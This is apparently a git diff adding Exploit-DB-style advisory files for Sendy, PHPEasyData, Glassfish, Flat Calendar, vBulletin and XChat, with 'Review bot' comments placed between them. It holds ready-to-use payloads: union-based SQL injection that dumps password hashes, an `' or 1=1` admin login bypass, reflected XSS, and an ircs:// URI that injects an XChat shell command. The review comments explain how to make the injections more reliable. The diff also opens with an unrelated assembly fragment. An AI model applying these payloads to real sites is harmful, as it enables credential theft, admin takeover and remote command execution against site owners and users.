+ alignb 4, db 0
+BufSafe dw trackbufsize/SECTOR_SIZE ; Clusters we can load into trackbuf
+BufSafeSec dw trackbufsize/SECTOR_SIZE ; = how many sectors?
+BufSafeBytes dw trackbufsize ; = how many bytes?
+EndOfGetCBuf dw getcbuf+trackbufsize ; = getcbuf+BufSafeBytes
+%ifndef DEPEND
+%if ( trackbufsize % SECTOR_SIZE ) != 0
+%error trackbufsize must be a multiple of SECTOR_SIZE
+%endif
+%endif
+
diff --git a/platforms/multiple/remote/31901.txt b/platforms/multiple/remote/31901.txt
new file mode 100755
index 000000000..fab339ab8
--- /dev/null
+++ b/platforms/multiple/remote/31901.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29646/info
+
+Sun Glassfish is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/configuration/httpListenerEdit.jsf?name=&configName=server-config
\ No newline at end of file
diff --git a/platforms/php/webapps/31898.txt b/platforms/php/webapps/31898.txt
new file mode 100755
index 000000000..5e8beb9a3
--- /dev/null
+++ b/platforms/php/webapps/31898.txt
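Review bot: The PoC URL on the last line of 31901.txt carries no payload — `name=` is empty — so the record never shows where the input is reflected or how, and the issue cannot be reproduced from this file. If `name` is the reflected parameter (the BID text quoted here does not say so, so this is an inference), the line should carry a harmless reflection marker such as `name=%3Cscript%3Ealert(1)%3C%2Fscript%3E&configName=server-config` and state that the value is echoed unencoded. `/configuration/httpListenerEdit.jsf` also looks like an admin-console page, which would make this an XSS against an authenticated administrator; confirm and record the privilege the victim must hold.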
@@ -0,0 +1,9 @@
+# Exploit Title: Sendy SqlInject
+# Date: 2014-02-24
+# Exploit Author: Hurley
+# Vendor Homepage: http://sendy.co/
+# Software Link: http://sendy.co/
+# Version: 1.1.8.4
+
+Demo page:
+http://server/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
diff --git a/platforms/php/webapps/31902.txt b/platforms/php/webapps/31902.txt
new file mode 100755
index 000000000..44be19e2c
--- /dev/null
+++ b/platforms/php/webapps/31902.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29655/info
+
+Noticia Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/detalle_noticia.php?id_noticia=[SQL]
\ No newline at end of file
diff --git a/platforms/php/webapps/31904.txt b/platforms/php/webapps/31904.txt
new file mode 100755
index 000000000..babce88f0
--- /dev/null
+++ b/platforms/php/webapps/31904.txt
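Review bot: The bare `--` at the end of the Sendy PoC URL in 31898.txt is fragile: MySQL only treats `--` as a comment when a whitespace character follows it, so the payload neutralises the rest of the statement only if the original query happens to continue with a space after the injection point; `--+`, `--%20` or `%23` is the conventional, unconditional form. The union also hard-codes 22 columns with `@@version` in column 7 without saying how the count was derived, so the record should note the enumeration step (an `ORDER BY` walk) for anyone retesting a different Sendy build where the select list may differ. The header block stops at `# Version: 1.1.8.4`; a `# Tested on:` line and the `i` parameter's role in `app` would make the entry self-contained.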
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29659/info
+
+PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHPEasyData 1.5.4 is vulnerable; other versions may also be affected.
+
+http://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,user_login,user_fname,user_access%20from%20an_users
\ No newline at end of file
diff --git a/platforms/php/webapps/31905.txt b/platforms/php/webapps/31905.txt
new file mode 100755
index 000000000..d0e108c5a
--- /dev/null
+++ b/platforms/php/webapps/31905.txt
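Review bot: Files 31904–31907.txt all open with the same four BID paragraphs and differ only in the final URL, so nothing in 31904.txt says that this one is the SQL-injection vector (the `annuaire` parameter of `annuaire.php`) rather than one of the XSS entries; a title line such as `# PHPEasyData 1.5.4 - annuaire.php 'annuaire' union-based SQL injection (4 columns)` would fix that. The union reads `user_pass,user_login,user_fname,user_access from an_users`, i.e. it dumps credential hashes from the live database, so the record should carry the usual authorized-testing caveat and say where in the page the row is rendered — the text is silent on that. The payload has no comment terminator, which means any clause following the injection point stays in force; presumably that is why a 4-column union without `--` was chosen, and it is worth stating.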
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/29659/info
+
+PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHPEasyData 1.5.4 is vulnerable; other versions may also be affected.
+
+-admin/login.php
+Due to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login:
+' or 1=1-- /**
\ No newline at end of file
diff --git a/platforms/php/webapps/31906.txt b/platforms/php/webapps/31906.txt
new file mode 100755
index 000000000..be686262b
--- /dev/null
+++ b/platforms/php/webapps/31906.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29659/info
+
+PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHPEasyData 1.5.4 is vulnerable; other versions may also be affected.
+
+http://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E
\ No newline at end of file
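Review bot: The bypass payload `' or 1=1-- /**` in 31905.txt does not say which login field it is entered in, and that matters: in the username field it typically comments out the password comparison altogether, whereas in the password field the outcome depends on how the query is assembled, so the record should read something like `username: ' or 1=1-- /**` (whichever field the author used). The trailing `/**` sits inside the `-- ` line comment and is inert, which may mislead readers into thinking the inline-comment form is required. `or 1=1` also logs in as whichever row the database returns first, which is the admin account only if that row happens to be it — worth a sentence so nobody assumes guaranteed admin access.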
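Review bot: The `annuaire` parameter that 31906.txt shows reflected unencoded by `last_records.php` is the same parameter that 31904.txt shows reaching an SQL query in `annuaire.php`, so a complete fix needs both output encoding and a parameterised query; a line such as `# Same parameter as the SQLi in 31904 - fix the query and the output, not just one` would stop someone patching only the XSS. The `alert(document.cookie)` probe proves reflection but not cookie theft — with an HttpOnly session cookie it shows nothing — so the text should describe it as a reflection marker rather than as demonstrated credential theft.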
diff --git a/platforms/php/webapps/31907.txt b/platforms/php/webapps/31907.txt
new file mode 100755
index 000000000..cb0b14731
--- /dev/null
+++ b/platforms/php/webapps/31907.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/29659/info
+
+PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHPEasyData 1.5.4 is vulnerable; other versions may also be affected.
+
+http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/31908.txt b/platforms/php/webapps/31908.txt
new file mode 100755
index 000000000..e31f0187d
--- /dev/null
+++ b/platforms/php/webapps/31908.txt
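Review bot: The three URLs in 31907.txt target `by`, `cat_id` and `annuaire` on `annuaire.php`, and `sort_field`/`by` are named like ORDER BY inputs; the file only demonstrates reflection, so whether those two also reach the query is unknown, and a hedged pointer such as `# by/sort_field look like sort parameters - check for ORDER BY injection; not demonstrated here` would save the next tester from assuming the XSS is the whole story. As written the entry repeats the BID boilerplate verbatim from 31904–31906 with no title line marking it as the annuaire.php XSS record, so a header naming the script and the three parameters would help anyone scanning the corpus.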
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29662/info
+
+Flat Calendar is prone to multiple authentication-bypass vulnerabilities because it fails to perform adequate authentication checks.
+
+An attacker can exploit these issues to gain unauthorized access to the application and make arbitrary changes to its configuration. This may lead to further attacks.
+
+Flat Calendar 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/calender_path/admin/add.php
+http://www.example.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid]
+
+
diff --git a/platforms/php/webapps/31910.txt b/platforms/php/webapps/31910.txt
new file mode 100755
index 000000000..77035d062
--- /dev/null
+++ b/platforms/php/webapps/31910.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29704/info
+
+vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+vBulletin 3.7.1 and 3.6.10 are vulnerable; other versions may also be affected.
+
+http://www.example.com/vB3/admincp/index.php?redirect={XSS}
+http://www.example.com/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
+http://www.example.com/vB3/admincp/index.php?redirect=data:text/html;base64,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
+
diff --git a/platforms/windows/remote/31909.html b/platforms/windows/remote/31909.html
new file mode 100755
index 000000000..b02c2edbf
--- /dev/null
+++ b/platforms/windows/remote/31909.html
@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/29696/info
+
+XChat is prone to a vulnerability that allows remote attackers to execute arbitrary commands in the context of the vulnerable user. This issue may lead to a remote compromise.
+
+The issue arises because of improper handling of the 'ircs://' URI.
+
+XChat 2.8.7b and prior versions are vulnerable to the issue.
+
+##################################################################################################################
+#
+# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
+# Vendor : http://xchat.org/
+# Affected Os : Windows *
+# Risk : critical
+#
+# This bug is related to the URI Handler vulnerability but the approch is a bit different.
+# We don't use any % or ../../../ as the others related bugs, just a single "
+# According to the registry , when the IRCS:// URI is called , the command launched is :
+# C:\Program Files\xchat\xchat.exe --existing --url="%1"
+#
+# The xchat --help option tells us :
+# " --command=COMMAND :Send a command to existing xchat "
+#
+# So we add a simple " at the end of the URL and we're in business ?
+# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
+#
+# Note: The victim needs to be connected to an irc server , and also need IE * .
+#
+#
+#
+# Greetz: French/Quebec community, http://spiritofhack.net/
+#
+# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
+#
+# Poc: this only launch the calc, sky is the limit passed this point.
+
+Welcome to my personal website
+
+
+
+
\ No newline at end of file
